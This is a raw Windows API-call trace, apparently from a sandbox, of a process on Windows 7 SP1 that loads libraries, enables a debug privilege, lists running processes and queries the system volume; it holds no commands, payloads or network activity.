[0564.012] __dllonexit () returned 0x7fef4b8af50
[0564.012] __dllonexit () returned 0x7fef4b8af84
[0564.013] __dllonexit () returned 0x7fef4b8afb8
[0564.013] __dllonexit () returned 0x7fef4b8afec
[0564.013] __dllonexit () returned 0x7fef4b8b020
[0564.013] __dllonexit () returned 0x7fef4b8b054
[0564.014] __dllonexit () returned 0x7fef4b8b088
[0564.014] __dllonexit () returned 0x7fef4b8b0bc
[0564.014] __dllonexit () returned 0x7fef4b8b0f0
[0564.015] __dllonexit () returned 0x7fef4b8b124
[0564.015] __dllonexit () returned 0x7fef4b8b158
[0564.015] __dllonexit () returned 0x7fef4b8b18c
[0564.017] __dllonexit () returned 0x7fef4b8b1c0
[0564.017] __dllonexit () returned 0x7fef4b8b210
[0564.017] __dllonexit () returned 0x7fef4b8b244
[0564.017] __dllonexit () returned 0x7fef4b8b278
[0564.018] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x1d0
[0564.018] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x1d4
[0564.018] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x1d8
[0564.018] __dllonexit () returned 0x7fef4b8b2ac
[0564.018] __dllonexit () returned 0x7fef4b8b2f8
[0564.018] __dllonexit () returned 0x7fef4b8b32c
[0564.019] __dllonexit () returned 0x7fef4b8b360
[0564.019] __dllonexit () returned 0x7fef4b8b394
[0564.019] __dllonexit () returned 0x7fef4b8b3c8
[0564.019] __dllonexit () returned 0x7fef4b8b3fc
[0564.020] __dllonexit () returned 0x7fef4b8b430
[0564.020] __dllonexit () returned 0x7fef4b8b464
[0564.020] __dllonexit () returned 0x7fef4b8b498
[0564.020] __dllonexit () returned 0x7fef4b8b4cc
[0564.021] __dllonexit () returned 0x7fef4b8b500
[0564.021] __dllonexit () returned 0x7fef4b8b534
[0564.021] __dllonexit () returned 0x7fef4b8b568
[0564.021] __dllonexit () returned 0x7fef4b8b59c
[0564.022] __dllonexit () returned 0x7fef4b8b5d0
[0564.022] __dllonexit () returned 0x7fef4b8b604
[0564.022] __dllonexit () returned 0x7fef4b8b618
[0564.022] __dllonexit () returned 0x7fef4b8b62c
[0564.023] __dllonexit () returned 0x7fef4b8b640
[0564.023] __dllonexit () returned 0x7fef4b8b674
[0564.023] __dllonexit () returned 0x7fef4b8b6a8
[0564.024] __dllonexit () returned 0x7fef4b8b6bc
[0564.024] __dllonexit () returned 0x7fef4b8b6d0
[0564.024] __dllonexit () returned 0x7fef4b8b6e4
[0564.024] __dllonexit () returned 0x7fef4b8b718
[0564.025] __dllonexit () returned 0x7fef4b8b740
[0564.025] __dllonexit () returned 0x7fef4b8b76c
[0564.025] __dllonexit () returned 0x7fef4b8b780
[0564.026] __dllonexit () returned 0x7fef4b8b7b4
[0564.027] __dllonexit () returned 0x7fef4b8b7e8
[0564.027] __dllonexit () returned 0x7fef4b8b838
[0564.028] __dllonexit () returned 0x7fef4b8b84c
[0564.028] malloc (_Size=0x1680) returned 0x3e5020
[0564.028] __dllonexit () returned 0x7fef4b8b860
[0564.028] __dllonexit () returned 0x7fef4b8b8ac
[0564.029] __dllonexit () returned 0x7fef4b8b8e0
[0564.029] __dllonexit () returned 0x7fef4b8b908
[0564.030] __dllonexit () returned 0x7fef4b8b93c
[0564.030] __dllonexit () returned 0x7fef4b8b970
[0564.030] __dllonexit () returned 0x7fef4b8b9a4
[0564.030] __dllonexit () returned 0x7fef4b8b9d8
[0564.030] __dllonexit () returned 0x7fef4b8ba0c
[0564.031] __dllonexit () returned 0x7fef4b8ba40
[0564.032] __dllonexit () returned 0x7fef4b8ba74
[0564.032] __dllonexit () returned 0x7fef4b8bab8
[0564.032] __dllonexit () returned 0x7fef4b8baec
[0564.032] __dllonexit () returned 0x7fef4b8bb20
[0564.033] __dllonexit () returned 0x7fef4b8bb54
[0564.033] __dllonexit () returned 0x7fef4b8bb88
[0564.033] __dllonexit () returned 0x7fef4b8bbbc
[0564.033] __dllonexit () returned 0x7fef4b8bbf0
[0564.034] __dllonexit () returned 0x7fef4b8bc24
[0564.034] __dllonexit () returned 0x7fef4b8bc58
[0564.034] __dllonexit () returned 0x7fef4b8bc8c
[0564.034] __dllonexit () returned 0x7fef4b8bcc0
[0564.036] StringFromGUID2 (in: rguid=0x7fef4b9f270*(Data1=0x8ecc055d, Data2=0x47f, Data3=0x11d1, Data4=([0]=0xa5, [1]=0x37, [2]=0x0, [3]=0x0, [4]=0xf8, [5]=0x75, [6]=0x3e, [7]=0xd1)), lpsz=0x3e908c, cchMax=128 | out: lpsz="{8ECC055D-047F-11D1-A537-0000F8753ED1}") returned 39
[0564.037] __dllonexit () returned 0x7fef4b8bcf4
[0564.037] __dllonexit () returned 0x7fef4b8bd98
[0564.037] __dllonexit () returned 0x7fef4b8bddc
[0564.038] __dllonexit () returned 0x7fef4b8be10
[0564.038] __dllonexit () returned 0x7fef4b8be44
[0564.038] __dllonexit () returned 0x7fef4b8be78
[0564.039] StringFromGUID2 (in: rguid=0x7fef4b9f270*(Data1=0x8ecc055d, Data2=0x47f, Data3=0x11d1, Data4=([0]=0xa5, [1]=0x37, [2]=0x0, [3]=0x0, [4]=0xf8, [5]=0x75, [6]=0x3e, [7]=0xd1)), lpsz=0x3ea28c, cchMax=128 | out: lpsz="{8ECC055D-047F-11D1-A537-0000F8753ED1}") returned 39
[0564.040] __dllonexit () returned 0x7fef4b8beac
[0564.040] __dllonexit () returned 0x7fef4b8bec0
[0564.040] __dllonexit () returned 0x7fef4b8bef4
[0564.044] StringFromGUID2 (in: rguid=0x7fef4b9f270*(Data1=0x8ecc055d, Data2=0x47f, Data3=0x11d1, Data4=([0]=0xa5, [1]=0x37, [2]=0x0, [3]=0x0, [4]=0xf8, [5]=0x75, [6]=0x3e, [7]=0xd1)), lpsz=0x3ea42c, cchMax=128 | out: lpsz="{8ECC055D-047F-11D1-A537-0000F8753ED1}") returned 39
[0564.045] __dllonexit () returned 0x7fef4b8bf28
[0564.045] __dllonexit () returned 0x7fef4b8bfb4
[0564.047] StringFromGUID2 (in: rguid=0x7fef4b9f270*(Data1=0x8ecc055d, Data2=0x47f, Data3=0x11d1, Data4=([0]=0xa5, [1]=0x37, [2]=0x0, [3]=0x0, [4]=0xf8, [5]=0x75, [6]=0x3e, [7]=0xd1)), lpsz=0x3ea63c, cchMax=128 | out: lpsz="{8ECC055D-047F-11D1-A537-0000F8753ED1}") returned 39
[0564.047] __dllonexit () returned 0x7fef4b8bfe8
[0564.047] __dllonexit () returned 0x7fef4b8c08c
[0564.047] __dllonexit () returned 0x7fef4b8c0c0
[0564.048] __dllonexit () returned 0x7fef4b8c0f4
[0564.049] StringFromGUID2 (in: rguid=0x7fef4b9f270*(Data1=0x8ecc055d, Data2=0x47f, Data3=0x11d1, Data4=([0]=0xa5, [1]=0x37, [2]=0x0, [3]=0x0, [4]=0xf8, [5]=0x75, [6]=0x3e, [7]=0xd1)), lpsz=0x3eafdc, cchMax=128 | out: lpsz="{8ECC055D-047F-11D1-A537-0000F8753ED1}") returned 39
[0564.049] __dllonexit () returned 0x7fef4b8c128
[0564.049] __dllonexit () returned 0x7fef4b8c150
[0564.050] __dllonexit () returned 0x7fef4b8c184
[0564.050] __dllonexit () returned 0x7fef4b8c198
[0564.051] __dllonexit () returned 0x7fef4b8c1ac
[0564.052] __dllonexit () returned 0x7fef4b8c1c0
[0564.053] __dllonexit () returned 0x7fef4b8c1d4
[0564.054] __dllonexit () returned 0x7fef4b8c1e8
[0564.054] __dllonexit () returned 0x7fef4b8c1fc
[0564.055] __dllonexit () returned 0x7fef4b8c210
[0564.056] __dllonexit () returned 0x7fef4b8c224
[0564.057] __dllonexit () returned 0x7fef4b8c238
[0564.057] __dllonexit () returned 0x7fef4b8c24c
[0564.058] __dllonexit () returned 0x7fef4b8c260
[0564.059] __dllonexit () returned 0x7fef4b8c274
[0564.059] __dllonexit () returned 0x7fef4b8c288
[0564.060] __dllonexit () returned 0x7fef4b8c29c
[0564.060] __dllonexit () returned 0x7fef4b8c2b0
[0564.061] __dllonexit () returned 0x7fef4b8c2c4
[0564.061] __dllonexit () returned 0x7fef4b8c2d8
[0564.062] __dllonexit () returned 0x7fef4b8c2ec
[0564.062] __dllonexit () returned 0x7fef4b8c300
[0564.063] __dllonexit () returned 0x7fef4b8c314
[0564.064] __dllonexit () returned 0x7fef4b8c328
[0564.064] StringFromGUID2 (in: rguid=0x7fef4b9f270*(Data1=0x8ecc055d, Data2=0x47f, Data3=0x11d1, Data4=([0]=0xa5, [1]=0x37, [2]=0x0, [3]=0x0, [4]=0xf8, [5]=0x75, [6]=0x3e, [7]=0xd1)), lpsz=0x3eea5c, cchMax=128 | out: lpsz="{8ECC055D-047F-11D1-A537-0000F8753ED1}") returned 39
[0564.065] __dllonexit () returned 0x7fef4b8c35c
[0564.065] __dllonexit () returned 0x7fef4b8c3e8
[0564.065] __dllonexit () returned 0x7fef4b8c42c
[0564.067] __dllonexit () returned 0x7fef4b8c454
[0564.067] __dllonexit () returned 0x7fef4b8c498
[0564.068] __dllonexit () returned 0x7fef4b8c4e4
[0564.068] __dllonexit () returned 0x7fef4b8c50c
[0564.068] __dllonexit () returned 0x7fef4b8c540
[0564.068] __dllonexit () returned 0x7fef4b8c574
[0564.069] __dllonexit () returned 0x7fef4b8c5a8
[0564.069] __dllonexit () returned 0x7fef4b8c5dc
[0564.069] __dllonexit () returned 0x7fef4b8c610
[0564.070] __dllonexit () returned 0x7fef4b8c644
[0564.070] __dllonexit () returned 0x7fef4b8c678
[0564.070] __dllonexit () returned 0x7fef4b8c6ac
[0564.071] __dllonexit () returned 0x7fef4b8c6e0
[0564.071] __dllonexit () returned 0x7fef4b8c714
[0564.071] malloc (_Size=0x60) returned 0x3f00d0
[0564.071] malloc (_Size=0x18) returned 0x3eebc0
[0564.071] malloc (_Size=0x18) returned 0x3eebe0
[0564.071] __dllonexit () returned 0x7fef4b8c740
[0564.072] __dllonexit () returned 0x7fef4b8c74c
[0564.072] GetVersionExW (in: lpVersionInformation=0xcec1e0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcec1e0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0564.072] __dllonexit () returned 0x7fef4b8c760
[0564.073] __dllonexit () returned 0x7fef4b8c774
[0564.073] malloc (_Size=0x60) returned 0x3f0140
[0564.073] malloc (_Size=0x18) returned 0x3eec00
[0564.073] malloc (_Size=0x18) returned 0x3eec20
[0564.073] __dllonexit () returned 0x7fef4b8c788
[0564.073] __dllonexit () returned 0x7fef4b8c794
[0564.074] malloc (_Size=0x60) returned 0x3f01b0
[0564.074] malloc (_Size=0x18) returned 0x3eec40
[0564.074] malloc (_Size=0x18) returned 0x3eec60
[0564.074] __dllonexit () returned 0x7fef4b8c7a8
[0564.074] malloc (_Size=0x60) returned 0x3f0220
[0564.074] malloc (_Size=0x18) returned 0x3eec80
[0564.074] malloc (_Size=0x18) returned 0x3eeca0
[0564.074] __dllonexit () returned 0x7fef4b8c7b4
[0564.074] malloc (_Size=0x60) returned 0x3f0290
[0564.074] malloc (_Size=0x18) returned 0x3eecc0
[0564.075] malloc (_Size=0x18) returned 0x3eece0
[0564.075] __dllonexit () returned 0x7fef4b8c7c0
[0564.075] malloc (_Size=0x60) returned 0x3f0330
[0564.075] malloc (_Size=0x18) returned 0x3eed00
[0564.075] malloc (_Size=0x18) returned 0x3eed20
[0564.075] __dllonexit () returned 0x7fef4b8c7cc
[0564.075] malloc (_Size=0x60) returned 0x3f03a0
[0564.075] malloc (_Size=0x18) returned 0x3eed40
[0564.076] malloc (_Size=0x18) returned 0x3eed60
[0564.076] __dllonexit () returned 0x7fef4b8c7d8
[0564.076] malloc (_Size=0x60) returned 0x3f0410
[0564.076] malloc (_Size=0x18) returned 0x3eed80
[0564.076] malloc (_Size=0x18) returned 0x3eeda0
[0564.076] __dllonexit () returned 0x7fef4b8c7e4
[0564.076] malloc (_Size=0x60) returned 0x3f0480
[0564.076] malloc (_Size=0x18) returned 0x3eedc0
[0564.076] malloc (_Size=0x18) returned 0x3eede0
[0564.076] __dllonexit () returned 0x7fef4b8c7f0
[0564.077] malloc (_Size=0x60) returned 0x3f04f0
[0564.077] malloc (_Size=0x18) returned 0x3eee00
[0564.077] malloc (_Size=0x18) returned 0x3eee20
[0564.077] __dllonexit () returned 0x7fef4b8c7fc
[0564.077] malloc (_Size=0x60) returned 0x3f0560
[0564.077] malloc (_Size=0x18) returned 0x3eee40
[0564.077] malloc (_Size=0x18) returned 0x3eee60
[0564.077] __dllonexit () returned 0x7fef4b8c808
[0564.077] malloc (_Size=0x60) returned 0x3f05d0
[0564.077] malloc (_Size=0x18) returned 0x3eee80
[0564.077] malloc (_Size=0x18) returned 0x3eeea0
[0564.077] __dllonexit () returned 0x7fef4b8c814
[0564.078] DisableThreadLibraryCalls (hLibModule=0x7fef4a50000) returned 1
[0564.078] malloc (_Size=0x28) returned 0x3efa50
[0564.078] StringFromGUID2 (in: rguid=0x7fef4b9e710*(Data1=0x3dd82d10, Data2=0xe6f1, Data3=0x11d2, Data4=([0]=0xb1, [1]=0x39, [2]=0x0, [3]=0x10, [4]=0x5a, [5]=0x1f, [6]=0x77, [7]=0xa1)), lpsz=0xcec170, cchMax=128 | out: lpsz="{3DD82D10-E6F1-11D2-B139-00105A1F77A1}") returned 39
[0564.078] malloc (_Size=0x30) returned 0x3ee0c0
[0564.078] malloc (_Size=0x28) returned 0x3efb10
[0564.078] StringFromGUID2 (in: rguid=0x7fef4b9e720*(Data1=0xd31b6a3f, Data2=0x9350, Data3=0x40de, Data4=([0]=0xa3, [1]=0xfc, [2]=0xa7, [3]=0xed, [4]=0xeb, [5]=0x9b, [6]=0x7c, [7]=0x63)), lpsz=0xcec170, cchMax=128 | out: lpsz="{D31B6A3F-9350-40DE-A3FC-A7EDEB9B7C63}") returned 39
[0564.078] malloc (_Size=0x30) returned 0x3ee100
[0564.079] DllGetClassObject (in: rclsid=0x201550*(Data1=0xd63a5850, Data2=0x8f16, Data3=0x11cf, Data4=([0]=0x9f, [1]=0x47, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbf, [6]=0x34, [7]=0x5c)), riid=0xcedc70*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xcecf70 | out: ppv=0xcecf70*=0x3eeec0) returned 0x0
[0564.088] GetModuleHandleW (lpModuleName="AdvAPI32") returned 0x7feff320000
[0564.088] GetProcAddress (hModule=0x7feff320000, lpProcName="EventRegister") returned 0x77c6cac0
[0564.088] GetProcAddress (hModule=0x7feff320000, lpProcName="EventUnregister") returned 0x77c53c80
[0564.088] GetProcAddress (hModule=0x7feff320000, lpProcName="EventWrite") returned 0x77c5b510
[0564.088] GetProcAddress (hModule=0x7feff320000, lpProcName="EventActivityIdControl") returned 0x77c38b60
[0564.089] GetProcAddress (hModule=0x7feff320000, lpProcName="EventWriteTransfer") returned 0x77d05370
[0564.089] GetProcAddress (hModule=0x7feff320000, lpProcName="EventEnabled") returned 0x77c5c0b0
[0564.089] EtwEventRegister (in: ProviderId=0x7fefa2a60c0, EnableCallback=0x0, CallbackContext=0x0, RegHandle=0x7fefa2c9fc0 | out: RegHandle=0x7fefa2c9fc0) returned 0x0
[0564.089] EtwEventWrite (RegHandle=0x1100010001, EventDescriptor=0x7fefa2a60b0, UserDataCount=0x5, UserData=0xcee390) returned 0x0
[0564.091] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ ()
[0564.109] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () returned 0x2
[0564.128] SetLastError (dwErrCode=0x0)
[0564.129] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0xcee628, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xcee530 | out: pulNumLanguages=0xcee628, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xcee530) returned 1
[0564.129] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x8) returned 0x1fd9b0
[0564.129] SetLastError (dwErrCode=0x0)
[0564.129] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0xcee628, pwszLanguagesBuffer=0x1fd9b0, pcchLanguagesBuffer=0xcee530 | out: pulNumLanguages=0xcee628, pwszLanguagesBuffer=0x1fd9b0, pcchLanguagesBuffer=0xcee530) returned 1
[0564.129] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x8) returned 0x1fd9d0
[0564.129] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1fd9b0 | out: hHeap=0x1c0000) returned 1
[0564.129] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x20) returned 0x226e50
[0564.129] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x226e50, pulNumLanguages=0xcee628 | out: pulNumLanguages=0xcee628) returned 1
[0564.130] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x226e50 | out: hHeap=0x1c0000) returned 1
[0564.138] SafeArrayGetElemsize (psa=0x22b160) returned 0x8
[0564.138] SafeArrayPutElement (psa=0x22b160, rgIndices=0xcede60, pv=0x227038) returned 0x0
[0564.138] SafeArrayRedim (in: psa=0x22b160, psaboundNew=0xcede78 | out: psa=0x22b160) returned 0x0
[0564.139] SafeArrayCopy (in: psa=0x22b160, ppsaOut=0xceddc0 | out: ppsaOut=0xceddc0) returned 0x0
[0564.141] malloc (_Size=0xb0) returned 0x3f1bc0
[0564.141] LoadLibraryW (lpLibFileName="NTDLL.DLL") returned 0x77c30000
[0564.142] GetProcAddress (hModule=0x77c30000, lpProcName="RtlInitUnicodeString") returned 0x77c85280
[0564.142] GetProcAddress (hModule=0x77c30000, lpProcName="RtlFreeUnicodeString") returned 0x77c85610
[0564.142] GetProcAddress (hModule=0x77c30000, lpProcName="NtSetSystemEnvironmentValue") returned 0x77c829e0
[0564.142] GetProcAddress (hModule=0x77c30000, lpProcName="NtQuerySystemEnvironmentValue") returned 0x77c825e0
[0564.142] GetProcAddress (hModule=0x77c30000, lpProcName="NtCreateFile") returned 0x77c81860
[0564.142] GetProcAddress (hModule=0x77c30000, lpProcName="NtQuerySystemInformation") returned 0x77c81670
[0564.142] GetProcAddress (hModule=0x77c30000, lpProcName="NtQueryDirectoryObject") returned 0x77c82440
[0564.142] GetProcAddress (hModule=0x77c30000, lpProcName="NtQueryObject") returned 0x77c81410
[0564.143] GetProcAddress (hModule=0x77c30000, lpProcName="NtOpenDirectoryObject") returned 0x77c81890
[0564.143] GetProcAddress (hModule=0x77c30000, lpProcName="NtQueryInformationProcess") returned 0x77c814a0
[0564.143] GetProcAddress (hModule=0x77c30000, lpProcName="NtQueryInformationToken") returned 0x77c81520
[0564.143] GetProcAddress (hModule=0x77c30000, lpProcName="NtOpenFile") returned 0x77c81640
[0564.143] GetProcAddress (hModule=0x77c30000, lpProcName="NtClose") returned 0x77c81400
[0564.143] GetProcAddress (hModule=0x77c30000, lpProcName="NtFsControlFile") returned 0x77c816a0
[0564.143] GetProcAddress (hModule=0x77c30000, lpProcName="NtQueryVolumeInformationFile") returned 0x77c817a0
[0564.143] malloc (_Size=0x18) returned 0x3eef20
[0564.143] GetCurrentThread () returned 0xfffffffffffffffe
[0564.143] OpenThreadToken (in: ThreadHandle=0xfffffffffffffffe, DesiredAccess=0x28, OpenAsSelf=1, TokenHandle=0xcedc18 | out: TokenHandle=0xcedc18*=0x1e8) returned 1
[0564.144] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x7feff320000
[0564.144] GetProcAddress (hModule=0x7feff320000, lpProcName="LookupPrivilegeValueW") returned 0x7feff33b9e0
[0564.144] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0xcedbf4 | out: lpLuid=0xcedbf4*(LowPart=0x14, HighPart=0)) returned 1
[0564.146] SetLastError (dwErrCode=0x0)
[0564.146] AdjustTokenPrivileges (in: TokenHandle=0x1e8, DisableAllPrivileges=0, NewState=0xcedbf0*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
[0564.146] GetLastError () returned 0x514
[0564.146] CloseHandle (hObject=0x1e8) returned 1
[0564.147] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x7feff600000
[0564.148] GetProcAddress (hModule=0x7feff600000, lpProcName=0xf) returned 0x7feff603f80
[0564.148] malloc (_Size=0x18) returned 0x3eef40
[0564.148] GetProcAddress (hModule=0x7feff600000, lpProcName=0x2) returned 0x7feff603480
[0564.150] GetProcAddress (hModule=0x7feff600000, lpProcName=0x1a) returned 0x7feff6076e0
[0564.150] SafeArrayPutElement (psa=0x22b1e0, rgIndices=0xcedc98, pv=0x22b118) returned 0x0
[0564.150] SafeArrayPutElement (psa=0x22b3a0, rgIndices=0xcedc98, pv=0x22b118) returned 0x0
[0564.150] GetProcAddress (hModule=0x7feff600000, lpProcName=0x6) returned 0x7feff601320
[0564.150] free (_Block=0x3eef40)
[0564.151] GetProcAddress (hModule=0x7feff600000, lpProcName=0x10) returned 0x7feff604170
[0564.151] malloc (_Size=0x8000) returned 0x3f1c80
[0564.151] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3f1c80, Length=0x8000, ResultLength=0x0 | out: SystemInformation=0x3f1c80, ResultLength=0x0) returned 0xc0000004
[0564.152] free (_Block=0x3f1c80)
[0564.153] malloc (_Size=0x10000) returned 0x3f1c80
[0564.153] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3f1c80, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x3f1c80, ResultLength=0x0) returned 0x0
[0564.154] _ui64tow (_Value=0x0, _Buffer="謰#", _Radix=10) returned="0"
[0564.157] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="0") returned 1
[0564.158] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0564.158] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0564.158] LoadLibraryA (lpLibFileName="WINBRAND.dll") returned 0x7fef72d0000
[0564.161] GetProcAddress (hModule=0x7fef72d0000, lpProcName="BrandingLoadString") returned 0x7fef72d18b0
[0564.161] BrandingLoadString () returned 0x9
[0564.172] BrandingLoadString () returned 0x16
[0564.176] BrandingLoadString () returned 0x0
[0564.183] GetWindowsDirectoryW (in: lpBuffer=0xced000, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa
[0564.183] _vsnwprintf (in: _Buffer=0xcecb30, _BufferCount=0x104, _Format="\\\\.\\%c:", _ArgList=0xcecae8 | out: _Buffer="\\\\.\\C:") returned 6
[0564.183] CreateFileW (lpFileName="\\\\.\\C:" (normalized: "c:"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffffffffffff
[0564.183] GetLastError () returned 0x5
[0564.183] CreateFileW (lpFileName="\\\\.\\C:" (normalized: "c:"), dwDesiredAccess=0x0, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e8
[0564.183] DeviceIoControl (in: hDevice=0x1e8, dwIoControlCode=0x2d1080, lpInBuffer=0x0, nInBufferSize=0x0, lpOutBuffer=0xcecb10, nOutBufferSize=0xc, lpBytesReturned=0xcecb20, lpOverlapped=0x0 | out: lpOutBuffer=0xcecb10*, lpBytesReturned=0xcecb20*=0xc, lpOverlapped=0x0) returned 1
[0564.184] _vsnwprintf (in: _Buffer=0xced210, _BufferCount=0x103, _Format="\\Device\\Harddisk%ld\\Partition%ld", _ArgList=0xcecae8 | out: _Buffer="\\Device\\Harddisk0\\Partition1") returned 28
[0564.184] CloseHandle (hObject=0x1e8) returned 1
[0564.200] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x0) returned 0x0
[0564.200] CloseHandle (hObject=0x0) returned 0
[0564.201] _ui64tow (_Value=0x4, _Buffer="0", _Radix=10) returned="4"
[0564.205] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="4") returned 1
[0564.206] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0564.206] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0564.231] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4) returned 0x0
[0564.231] CloseHandle (hObject=0x0) returned 0
[0564.232] _ui64tow (_Value=0x110, _Buffer="4", _Radix=10) returned="272"
[0564.235] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="272") returned 3
[0564.236] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0564.236] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0564.251] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x110) returned 0x0
[0564.251] CloseHandle (hObject=0x0) returned 0
[0564.252] _ui64tow (_Value=0x15c, _Buffer="272", _Radix=10) returned="348"
[0564.255] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="348") returned 3
[0564.256] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0564.256] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0564.272] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x15c) returned 0x0
[0564.272] CloseHandle (hObject=0x0) returned 0
[0564.272] _ui64tow (_Value=0x180, _Buffer="348", _Radix=10) returned="384"
[0564.275] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="384") returned 3
[0564.276] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0564.276] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0564.288] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x180) returned 0x0
[0564.288] CloseHandle (hObject=0x0) returned 0
[0564.288] _ui64tow (_Value=0x18c, _Buffer="384", _Radix=10) returned="396"
[0564.297] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="396") returned 3
